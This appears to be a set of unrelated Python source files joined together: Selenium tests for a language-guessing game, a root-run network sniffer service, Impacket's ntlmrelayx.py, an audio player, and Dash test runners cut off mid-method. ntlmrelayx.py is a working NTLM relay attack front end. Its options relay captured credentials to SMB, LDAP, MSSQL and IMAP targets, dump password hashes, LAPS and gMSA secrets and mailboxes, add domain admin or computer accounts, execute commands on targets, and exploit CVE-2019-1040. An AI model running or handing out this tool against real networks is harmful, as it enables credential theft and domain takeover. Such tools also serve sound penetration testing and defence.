LanguageTest('Is it interpreted?', True, 'Python')
LanguageTest('Does it enforce indentation?', False, 'Ruby')
'''
# Setup test database
lt = LanguageTest('Does it enforce indentation?', False, 'Ruby')
db.session.add(lt)
db.session.commit()
driver = self.driver
# Index page to question page
driver.get(self.index_page_url)
qlink = driver.find_element_by_tag_name('a')
qlink.click()
# Question page, choose no, we don't have a guess result for it
qno = driver.find_element_by_css_selector('input[value="no"]')
qsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
qno, 'Question answer no radio button should exist.')
self.assertIsNotNone(qsubmit, 'Question submit button should exist.')
qno.click()
qsubmit.click()
# We should go back to question page now, which shows the second
# question.
self.assertEqual(driver.current_url, self.index_page_url + 'question',
'We should be at question page now.')
next_question = driver.find_element_by_tag_name('h2').text
self.assertEqual(next_question, lt.question,
'Next question should be %s' % lt.question)
def test_cannot_guess_from_current_question_go_to_next_question(self):
'''
This test tests this story:
Index Page -> Question Page -> Have A Guess?
-[Yes]-> Guess Page -> Guess Correctly?
-[No]-> Has More Questions? -[Yes]-> Question Page
During test, we assume the _first two_ records in database language test
table are:
LanguageTest('Is it interpreted?', True, 'Python')
LanguageTest('Does it enforce indentation?', False, 'Ruby')
'''
# Setup test database
lt = LanguageTest('Does it enforce indentation?', False, 'Ruby')
db.session.add(lt)
db.session.commit()
driver = self.driver
# Index page to question page
driver.get(self.index_page_url)
qlink = driver.find_element_by_tag_name('a')
qlink.click()
# Question page, choose yes, we have a guess result for it.
qyes = driver.find_element_by_css_selector('input[value="yes"]')
qsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
qyes, 'Question answer yes radio button should exist.')
self.assertIsNotNone(qsubmit, 'Question submit button should exist.')
qyes.click()
qsubmit.click()
# Guess page, choose _no_, our guess is wrong.
gno = driver.find_element_by_css_selector('input[value="no"]')
gsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
gno, 'Guess correctness no radio button should exist.')
self.assertIsNotNone(gsubmit, 'Guess submit button should exist.')
gno.click()
gsubmit.click()
# Since there're more questions, it will go to the next question now.
self.assertEqual(driver.current_url, self.index_page_url + 'question',
'We should see the next question page now.')
next_question = driver.find_element_by_tag_name('h2').text
self.assertEqual(next_question, lt.question,
'Next question should be %s' % lt.question)
def test_cannot_guess_language_go_to_new_language_page_finish_game(self):
'''
This test tests this story:
Index Page -> Question Page -> Have A Guess? -[Yes]-> Guess Page
-> Guess Correct? -[No]-> Has More Questions?
-[No]-> Add New Language Page -> Index Page
During test, we assume the _only_ record in database language test
table is:
LanguageTest('Is it interpreted?', True, 'Python')
'''
driver = self.driver
# Index page to question page
driver.get(self.index_page_url)
qlink = driver.find_element_by_tag_name('a')
qlink.click()
# Question page, choose yes, we have a guess result for it
qyes = driver.find_element_by_css_selector('input[value="yes"]')
qsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
qyes, 'Question answer yes radio button should exist.')
self.assertIsNotNone(qsubmit, 'Question submit button should exist.')
qyes.click()
qsubmit.click()
# Guess page, choose _no_, our guess is wrong
gno = driver.find_element_by_css_selector('input[value="no"]')
gsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
gno, 'Guess correctness no radio button should exist.')
self.assertIsNotNone(gsubmit, 'Guess submit button should exist.')
gno.click()
gsubmit.click()
# Since we don't know about the language, we go to add new language
# page.
self.assertEqual(driver.current_url,
self.index_page_url + 'new_language',
'We should be at new language page now.')
# And since we're here, we'll add the new language.
        llang = driver.find_element_by_css_selector('input[name="language"]')
lq = driver.find_element_by_css_selector('input[name="question"]')
lano = driver.find_element_by_css_selector(
'input[name="answer"][value="no"]')
lsubmit = driver.find_element_by_css_selector('input[type="submit"]')
llang.send_keys('Ruby')
lq.send_keys('Does it enforce indentation?')
lano.click()
lsubmit.click()
# Now we should be at index page now
self.assertEqual(driver.current_url, self.index_page_url,
'We should be at index page by now.')
# At last, we will verify the new language is entered into the database
t = LanguageTest.query.order_by(-LanguageTest.id).first()
nl = LanguageTest('Does it enforce indentation?', False, 'Ruby')
self.assertEqual(t, nl, '%r should be in database now' % nl)
def test_can_not_go_to_question_page_initially(self):
driver = self.driver
driver.get(self.index_page_url + 'question')
self.assertEqual(driver.current_url, self.index_page_url,
                         'Visiting the question page directly should redirect to the index page.')
def test_can_not_go_to_guess_page_initially(self):
driver = self.driver
driver.get(self.index_page_url + 'guess')
self.assertEqual(driver.current_url, self.index_page_url,
                         'Visiting the guess page directly should redirect to the index page.')
def test_can_not_go_to_add_new_language_page_initially(self):
driver = self.driver
driver.get(self.index_page_url + 'new_language')
self.assertEqual(driver.current_url, self.index_page_url,
                         'Visiting the add new language page directly should redirect to the index page.')
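# Hedged convenience addition (not part of the original test module): allow
# running these functional tests directly with `python functional_tests.py`;
# `python -m unittest functional_tests` works as well.
if __name__ == '__main__':
    unittest.main()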
|
service.py
|
import sys
import threading
import os
import signal
import argparse
import random
import time
import logging
logger = logging.getLogger(__name__)
# Hide requests from the logs
import requests
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.ERROR)
from clint.textui import colored
from clint.textui.colored import ColoredString
from multiprocessing import Process, Value
from dissemination.util import get_host_ip
def signal_handler(signum, frame):
"""
Signal handler that kills all the processes created by the application.
"""
logger.warn("Killing the running services.")
for process in processes:
logger.warn("Killing process {}".format(process.pid))
os.system("kill -9 {}".format(process.pid))
sys.exit(0)
def services(benchmark, device_name=None, filter_mask=None, batch_threads=1, no_scans=False):
"""
    Starts all the business-logic microservices.
:param benchmark: When benchmark parameter is True, we disable the database
and inference services for the purpose of benchmarking.
:param device_name: Device name passed to sniffing_service
:param filter_mask: Filter mask passed to sniffing_service.
    :param batch_threads: Batch size passed to graph_service (and the populator).
    :param no_scans: When no_scans is True, the populator is disabled.
:return: returns nothing
"""
from topology.graph.graph_service import graph_service
from topology.sniffer.sniffing_service import sniffing_service
from database.database_service import database_service
from inference.inference_service import inference_service
global processes
    if not benchmark:
        processes.append(Process(target=database_service))
        processes.append(Process(target=inference_service, kwargs={'env': os.environ.copy()}))
processes.append(Process(target=graph_service, args=(str(batch_threads), str(no_scans))))
processes.append(Process(target=sniffing_service, args=(device_name, filter_mask)))
def bind_simulation(simulation):
"""
Overrides the default services with a simulation.
The seam points are devices.open_connection and discovery.discovery_ip.
"""
import topology.sniffer.devices as devices
import topology.discovery.discovery as discovery
devices.open_connection = lambda device_name: [simulation.connection()]
discovery.discovery_ip = lambda ip: simulation.discovery_ip(ip)
def set_ports(node_type):
"""
Provides dynamic port binding for slave services and fixed port binding
for master services.
"""
import service.server as config_keeper
port_offset = 30000
if node_type == "slave":
config = {
'inference' : port_offset + random.randint(0, port_offset),
'database' : port_offset + random.randint(0, port_offset),
'sniffer' : port_offset + random.randint(0, port_offset),
'graph' : port_offset + random.randint(0, port_offset)
}
elif node_type == "master":
config = config_keeper.config
else:
logger.error("Wrong type specified.")
os.kill(os.getpid(), signal.SIGINT)
setattr(config_keeper, 'config', config)
def setup_loggers(verbose):
"""
Sets up loggers by the given level of verbosity. We also provide file
logging in the file 'attack-graph.log' (with DEBUG verbosity level).
:param verbose: when the flag for verbosity is set, the logging level is set
to DEBUG.
:return: returns nothing
"""
stderr_handler = logging.StreamHandler(sys.stderr)
class ColoredFormatter(logging.Formatter):
"""
Formatter that allows coloring logs via Clint library.
"""
def format(self, record):
msg = record.getMessage()
out_msg = '{}:{}:{}'.format(
str(record.levelname),
record.name,
str(msg)
)
if hasattr(record.msg, 'color'):
color = record.msg.color
colored_msg = str(ColoredString(color, str(out_msg)))
return colored_msg
return out_msg
    if verbose:
stderr_handler.setLevel(logging.DEBUG)
else:
stderr_handler.setLevel(logging.INFO)
stderr_handler.setFormatter(ColoredFormatter())
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# Logging to file as well
file_handler = logging.FileHandler('attack-graph.log')
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logging.basicConfig(
level=logging.DEBUG,
handlers=[stderr_handler, file_handler]
)
def setup_dissemination(args):
"""
Dissemination module setup.
:param args: the arguments received by the function are the arguments
received by the main application under the form of a dictionary.
:return: returns nothing
"""
if args.type == "master":
from dissemination.master import master_service
from dissemination.slave import slave_service
port_offset = 30000
port = port_offset + random.randint(0, port_offset)
        # When running a master we also need a slave, since only the slave keeps the graph
processes.append(Process(target=master_service))
processes.append(Process(target=slave_service, args=(get_host_ip(), port)))
if args.type == "slave":
master_ip = args.master
port = args.port
if master_ip is None or port is None:
logger.error("Not enough arguments provided for slave mode.")
os.kill(os.getpid(), signal.SIGINT)
from dissemination.slave import slave_service
processes.append(Process(target=slave_service, args=(master_ip, port)))
def setup_argparser():
"""
Argument parser setup using argparse library.
:return: returns an ArgumentParser
"""
parser = argparse.ArgumentParser()
parser.add_argument("type", type=str,
help="The type of node run: 'master' or 'slave'")
parser.add_argument("-m", "--master", type=str, default=None,
help="Specify master IP for connecting a slave.")
parser.add_argument("-p", "--port", type=str, default=None,
help="Specify port for runnning a slave.")
parser.add_argument("-i", "--interface", type=str, default=None,
help="The network interface listened to.")
parser.add_argument("-s", "--simulation", type=str, default=None,
help="To run a simulated network from a network configuration file use this flag.")
parser.add_argument("-f", "--filter", type=str, default=None,
help="Specify a mask for filtering the packets. (e.g. '10.1.1.1/16' would keep packets starting with '10.1')")
parser.add_argument("-v", '--verbose', dest='verbose', action='store_true',
help="Set the logging level to DEBUG.")
parser.add_argument("-b" , "--benchmark", dest='benchmark', action='store_true',
help="Disables database and inference engine for benchmarking.")
parser.add_argument("-t", "--batch_threads", type=int, default=1,
help="Number of threads that should run host discovery.")
parser.add_argument("-n", "--no-scan", dest='no_scan', action='store_true',
help="Disable port scanning.")
parser.set_defaults(verbose=False)
return parser
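# Hedged usage examples (illustrative only; addresses and interface names are
# placeholders, the flags are those defined in setup_argparser, and root is
# required by the check in __main__):
#   sudo python service.py master -v
#   sudo python service.py slave -m 192.168.1.10 -p 35000 -i eth0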
if __name__ == "__main__":
parser = setup_argparser()
args = parser.parse_args()
setup_loggers(args.verbose)
if os.getuid() != 0:
logger.error("Must be run as root.")
exit(1)
if args.simulation is not None:
from simulation.simulation import Simulation
args.interface = "virtual_interface"
bind_simulation(Simulation(args.simulation))
global processes
processes = []
set_ports(args.type)
    services(args.benchmark, args.interface, args.filter, args.batch_threads, args.no_scan)
setup_dissemination(args)
signal.signal(signal.SIGINT, signal_handler)
for process in processes:
process.start()
for process in processes:
process.join()
|
ntlmrelayx.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Generic NTLM Relay Module
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
# It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first try to authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the specific protocol clients (e.g. SMB, LDAP).
# It is supposed to be working on any LM Compatibility level. The only way
# to stop this attack is to enforce on the server SPN checks and or signing.
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want so that the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
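# Example invocations (illustrative only; targets and file names are
# placeholders, the flags are defined in the argument parser below):
#   ntlmrelayx.py -t smb://192.168.1.5 -smb2support
#   ntlmrelayx.py -tf targets.txt -socks
#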
import argparse
import sys
import logging
import cmd
try:
from urllib.request import ProxyHandler, build_opener, Request
except ImportError:
from urllib2 import ProxyHandler, build_opener, Request
import json
from threading import Thread
from impacket import version
from impacket.examples import logger
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
RELAY_SERVERS = []
class MiniShell(cmd.Cmd):
def __init__(self, relayConfig, threads):
cmd.Cmd.__init__(self)
self.prompt = 'ntlmrelayx> '
self.tid = None
self.relayConfig = relayConfig
self.intro = 'Type help for list of commands'
self.relayThreads = threads
self.serversRunning = True
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def emptyline(self):
pass
def do_targets(self, line):
for url in self.relayConfig.target.originalTargets:
print(url.geturl())
return
def do_finished_attacks(self, line):
for url in self.relayConfig.target.finishedAttacks:
print (url.geturl())
return
def do_socks(self, line):
headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"]
url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays"
try:
proxy_handler = ProxyHandler({})
opener = build_opener(proxy_handler)
response = Request(url)
r = opener.open(response)
result = r.read()
items = json.loads(result)
except Exception as e:
logging.error("ERROR: %s" % str(e))
else:
if len(items) > 0:
self.printTable(items, header=headers)
else:
logging.info('No Relays Available!')
def do_startservers(self, line):
if not self.serversRunning:
start_servers(options, self.relayThreads)
self.serversRunning = True
logging.info('Relay servers started')
else:
logging.error('Relay servers are already running!')
def do_stopservers(self, line):
if self.serversRunning:
stop_servers(self.relayThreads)
self.serversRunning = False
logging.info('Relay servers stopped')
else:
logging.error('Relay servers are already stopped!')
def do_exit(self, line):
print("Shutting down, please wait!")
return True
def do_EOF(self, line):
return self.do_exit(line)
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.sid)
c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setSMBChallenge(options.ntlmchallenge)
c.setInterfaceIp(options.interface_ip)
c.setExploitOptions(options.remove_mic, options.remove_target)
c.setWebDAVOptions(options.serve_image)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
def stop_servers(threads):
todelete = []
for thread in threads:
if isinstance(thread, tuple(RELAY_SERVERS)):
thread.server.shutdown()
todelete.append(thread)
# Now remove threads from the set
for thread in todelete:
threads.remove(thread)
del thread
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to specified target(s) system or the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help="Target to relay the credentials to, "
"can be an IP, hostname or URL like domain\\username@host:port (domain\\username and port "
"are optional, and don't forget to escape the '\\'). If unspecified, it will relay back "
"to the client')")
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
    parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient or LDAP console instead '
                        'of executing a command after a successful relay. This console will listen locally on a '
                        'tcp port and can be reached with, for example, netcat.')
# Interface address specification
parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
'bind SMB and HTTP servers',default='')
serversoptions = parser.add_mutually_exclusive_group()
serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute ntlmrelayx.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support')
parser.add_argument('-ntlmchallenge', action="store", default=None, help='Specifies the NTLM server challenge used by the '
'SMB Server (16 hex bytes long. eg: 1122334455667788)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
'setting the proxy host to the one supplied.')
parser.add_argument('-wa','--wpad-auth-num', action='store', type=int, default=1, help='Prompt for authentication N times for clients without MS16-077 installed '
'before serving a WPAD file. (default=1)')
parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
    parser.add_argument('--serve-image', action='store',help='local path of the image that will be returned to clients')
parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be'
' in the same directory). For RPC no output will be provided.')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
#RPC arguments
rpcoptions = parser.add_argument_group("RPC client options")
rpcoptions.add_argument('-rpc-mode', choices=["TSCH"], default="TSCH", help='Protocol to attack, only TSCH supported')
rpcoptions.add_argument('-rpc-use-smb', action='store_true', required=False, help='Relay DCE/RPC to SMB pipes')
rpcoptions.add_argument('-auth-smb', action='store', required=False, default='', metavar='[domain/]username[:password]',
help='Use this credential to authenticate to SMB (low-privilege account)')
rpcoptions.add_argument('-hashes-smb', action='store', required=False, metavar="LMHASH:NTHASH")
rpcoptions.add_argument('-rpc-smb-port', type=int, choices=[139, 445], default=445, help='Destination port to connect to SMB')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
    mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute '
                              '(can specify multiple)')
#HTTPS options
httpoptions = parser.add_argument_group("HTTP options")
httpoptions.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
httpoptions.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
httpoptions.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
httpoptions.add_argument('-remove-target', action='store_true', default=False,
help='Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account')
ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')
ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(0 = unlimited, default: no limit)')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.rpc_use_smb and not options.auth_smb:
logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes")
sys.exit(1)
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
# Let's register the protocol clients we have
# ToDo: Do this better somehow
from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS
from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if not options.no_smb_server:
RELAY_SERVERS.append(SMBRelayServer)
if not options.no_http_server:
RELAY_SERVERS.append(HTTPRelayServer)
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
threads = set()
socksServer = None
if options.socks is True:
# Start a SOCKS proxy in the background
socksServer = SOCKS()
socksServer.daemon_threads = True
socks_thread = Thread(target=socksServer.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
c = start_servers(options, threads)
print("")
logging.info("Servers started, waiting for connections")
try:
if options.socks:
shell = MiniShell(c, threads)
shell.cmdloop()
else:
sys.stdin.read()
except KeyboardInterrupt:
pass
else:
pass
if options.socks is True:
socksServer.shutdown()
del socksServer
for s in threads:
del s
sys.exit(0)
|
player.py
|
"""
"""
import threading
import types
import wave
import pyaudio
CHUNK_SIZE = 1024
class Player:
def __init__(self, pyaudio_instance=None):
self.pyaudio_instance = pyaudio_instance if pyaudio_instance else pyaudio.PyAudio()
self.stop_event = threading.Event()
self.device_index = None
for i in range(self.pyaudio_instance.get_device_count()):
dev = self.pyaudio_instance.get_device_info_by_index(i)
            name = dev['name']
            print('{}: {} with {} output channels'.format(i, name, dev['maxOutputChannels']))
            if 'ReSpeaker 4 Mic Array' in name and dev['maxOutputChannels'] >= 1:
self.device_index = i
break
if self.device_index is None:
raise ValueError('Can not find {}'.format('ReSpeaker 4 Mic Array'))
def _play(self, data, rate=16000, channels=1, width=2):
stream = self.pyaudio_instance.open(
format=self.pyaudio_instance.get_format_from_width(width),
channels=channels,
rate=rate,
output=True,
output_device_index=self.device_index,
frames_per_buffer=CHUNK_SIZE,
)
if isinstance(data, types.GeneratorType):
for d in data:
if self.stop_event.is_set():
break
stream.write(d)
else:
stream.write(data)
stream.close()
def play(self, wav=None, data=None, rate=16000, channels=1, width=2, block=True):
"""
play wav file or raw audio (string or generator)
Args:
wav: wav file path
data: raw audio data, str or iterator
rate: sample rate, only for raw audio
channels: channel number, only for raw data
width: raw audio data width, 16 bit is 2, only for raw data
            block: if true, block until audio is played.
"""
if wav:
f = wave.open(wav, 'rb')
rate = f.getframerate()
channels = f.getnchannels()
width = f.getsampwidth()
def gen(w):
d = w.readframes(CHUNK_SIZE)
while d:
yield d
d = w.readframes(CHUNK_SIZE)
w.close()
data = gen(f)
self.stop_event.clear()
if block:
self._play(data, rate, channels, width)
else:
thread = threading.Thread(target=self._play, args=(data, rate, channels, width))
thread.start()
def stop(self):
self.stop_event.set()
def close(self):
pass
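# Hedged usage sketch (illustrative only; 'music.wav' is a placeholder):
#   p = Player()
#   p.play('music.wav', block=False)  # returns immediately, plays in a background thread
#   p.stop()                          # sets the stop event to end playback early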
def main():
import sys
if len(sys.argv) < 2:
print('Usage: python {} music.wav'.format(sys.argv[0]))
sys.exit(1)
player = Player()
player.play(sys.argv[1])
if __name__ == '__main__':
main()
|
application_runners.py
|
import sys
import os
import uuid
import shlex
import threading
import shutil
import subprocess
import logging
import inspect
import runpy
import flask
import requests
from dash.testing.errors import NoAppFoundError, TestingTimeoutError, ServerCloseError
from dash.testing import wait
logger = logging.getLogger(__name__)
def import_app(app_file, application_name="app"):
"""Import a dash application from a module. The import path is in dot
notation to the module. The variable named app will be returned.
:Example:
>>> app = import_app("my_app.app")
Will import the application in module `app` of the package `my_app`.
:param app_file: Path to the app (dot-separated).
:type app_file: str
:param application_name: The name of the dash application instance.
:raise: dash_tests.errors.NoAppFoundError
:return: App from module.
:rtype: dash.Dash
"""
try:
app_module = runpy.run_module(app_file)
app = app_module[application_name]
except KeyError as app_name_missing:
logger.exception("the app name cannot be found")
raise NoAppFoundError(
"No dash `app` instance was found in {}".format(app_file)
) from app_name_missing
return app
class BaseDashRunner:
"""Base context manager class for running applications."""
def __init__(self, keep_open, stop_timeout):
self.port = 8050
self.started = None
self.keep_open = keep_open
self.stop_timeout = stop_timeout
self._tmp_app_path = None
def start(self, *args, **kwargs):
raise NotImplementedError # pragma: no cover
def stop(self):
raise NotImplementedError # pragma: no cover
@staticmethod
def accessible(url):
try:
requests.get(url)
except requests.exceptions.RequestException:
return False
return True
def __call__(self, *args, **kwargs):
return self.start(*args, **kwargs)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, traceback):
if self.started and not self.keep_open:
try:
logger.info("killing the app runner")
self.stop()
except TestingTimeoutError as cannot_stop_server:
raise ServerCloseError(
"Cannot stop server within {}s timeout".format(self.stop_timeout)
) from cannot_stop_server
logger.info("__exit__ complete")
@property
def url(self):
"""The default server url."""
return "http://localhost:{}".format(self.port)
@property
def is_windows(self):
return sys.platform == "win32"
@property
def tmp_app_path(self):
return self._tmp_app_path
class ThreadedRunner(BaseDashRunner):
"""Runs a dash application in a thread.
This is the default flavor to use in dash integration tests.
"""
def __init__(self, keep_open=False, stop_timeout=3):
super().__init__(keep_open=keep_open, stop_timeout=stop_timeout)
self.stop_route = "/_stop-{}".format(uuid.uuid4().hex)
self.thread = None
@staticmethod
def _stop_server():
# https://werkzeug.palletsprojects.com/en/0.15.x/serving/#shutting-down-the-server
stopper = flask.request.environ.get("werkzeug.server.shutdown")
if stopper is None:
raise RuntimeError("Not running with the Werkzeug Server")
stopper()
return "Flask server is shutting down"
# pylint: disable=arguments-differ
def start(self, app, **kwargs):
"""Start the app server in threading flavor."""
app.server.add_url_rule(self.stop_route, self.stop_route, self._stop_server)
def _handle_error():
self._stop_server()
app.server.errorhandler(500)(_handle_error)
def run():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
if "port" not in kwargs:
kwargs["port"] = self.port
else:
self.port = kwargs["port"]
app.run_server(threaded=True, **kwargs)
self.thread = threading.Thread(target=run)
self.thread.daemon = True
try:
self.thread.start()
except RuntimeError: # multiple call on same thread
logger.exception("threaded server failed to start")
self.started = False
